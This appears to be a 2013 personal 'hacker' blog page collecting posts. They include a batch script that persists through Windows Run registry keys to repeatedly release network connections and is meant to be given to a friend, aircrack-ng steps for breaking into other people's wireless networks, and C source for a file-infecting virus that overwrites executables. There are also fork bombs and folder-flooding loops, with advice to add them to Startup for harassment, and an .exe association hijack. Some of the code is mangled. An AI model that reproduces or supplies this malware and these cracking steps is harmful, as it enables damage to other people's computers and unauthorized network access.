share Knowledge with JayNandasana


Monday, 1 April 2013

PHJP - Professional Hacker jay patel.....

Trick to make Virus which can Disable Internet Permanently

There is a Trick to make Virus which can Disable Internet Permanently. To do this follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

echo @
echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d
:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

3) Save it as Internet Disabled.bat.

4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently.

And Give this file to your friend... But try At own your Risk .....

Post by: Professional Hacker jay patel
......................................................................................................................................................................................................................
 """""
software requirements

aircracking-ng

Back track

_________________________________________________________________________

** COMMANDS FOR HACKING WIRELESS:- **
*******************************************
1. **iwconfig (to check wireless name)**

2. **airmon-ng start (card name)**

3. **airodump-ng (monitor mode enable card name)**

now ctrl+c to stop

4. **airdump-ng -c (channel) --bssid (bssid number) -w crack (monitor mode enabled card name)**
To collect the data packets in the file.

c> Channel

w> Write

crack> File name(any name)

5. Open new konsole terminal for 5th command i.e.

To send the de-authentication packets.

**aireplay-ng -1 0 -a (bssid) (monitor mode enable card)**

6. To send the de-authentication packets again n again

**aireplay-ng -3 -b (bssid) (monitor mode enable card)**

7. Open New konsole for 7th command

To capture the password from the crack file.

**aircrack-ng crack-01.cap**

Post by: Professional Hacker jay patel
....................................................................................................................................................................................................
How to Unblock USB Ports Access.....

Go to Start > Run and type ‘devmgmt.msc’ and press enter to open device manager.
Now look for ‘Universal Serial bus Controller’ – Expand the list and find if there is any red colored cross.

If yes, simply right click on it and enable it.

Now insert your USB device again, if it works fine, then great otherwise head-on to next solution.
Changing Registry values for USB devices

Go to Start > Run and type ‘regedit’ and press enter to open open registry editor.
Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR
Double click on ‘Start’ to change its value to 3 and press ‘OK’.
 
Post by: Professional Hacker jay patel
..........................................................................................................................................................
How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
ples .. DO NOT SPREAD OR MISUSE THIS VIRUS CODE
 
Post by: Professional Hacker jay patel
..........................................................................................................................................................
How To Make A Viruses....
______________________________________________________________________

1. Open Notepad.

2. Type desired programs with extentions(.exe)

3. Save this file as Start.BAT

4. :hack (programs) goto hack

5. Please do it in virtual machine......
______________________________________________________________________

1. Open cmd

2. Go to Desktop using cd desktop

3. Go to Notepad and write

:hack
md hack
cd hack
copy C:\WINDOWS\system32 \\To increase size of folder
goto hack

n save this file as kuchbhi.bat

crtl+c to terminate
______________________________________________________________________

** To corrupt EXE Files **
************************
Open Notepad n follw these steps

assoc .exe=hacked

save as virus.bat

n to get it corrected

assoc .exe=exefile

n save it as patch.bat
______________________________________________________________________

@echo off
:abc

md %random%

goto abc

Don't try in personal computer

This virus creates 25000...... folders on ur desktop
______________________________________________________________________

%0|%0

new virus.

save it with anyname.bat

Don't RUN.....

Makes CPU Usage to 100%....

For More Harresment, copy this file to start/all programs/start up n copy to all users...
______________________________________________________________________

To increase startup speed

go to run n type msconfig n startup n diable unrequired programs...

 Post by: Professional Hacker jay patel
........................................................................................................................................................................
Dear avast! user,

Your license key is:

---------- Cut here ----------
C25979382H1200A0614-W6PBRY6N
----------Cut here ----------

To insert your license key, please follow the instructions below:

1. Highlight the license key above, then right click on it and select "Copy"
2. Open your avast Free Antivirus and select the Maintenance" tab on the left side. Then select "Registration"
3. Click the "Insert the license key" button at the bottom of the screen.
4. Right click in the empty Registration box then select "Paste"
5. Click "OK". Your license key is now inserted and the program can now be used free of charge for a further 12 months.
 Post by: Professional Hacker jay patel
.................................................................................................................................................................................................................................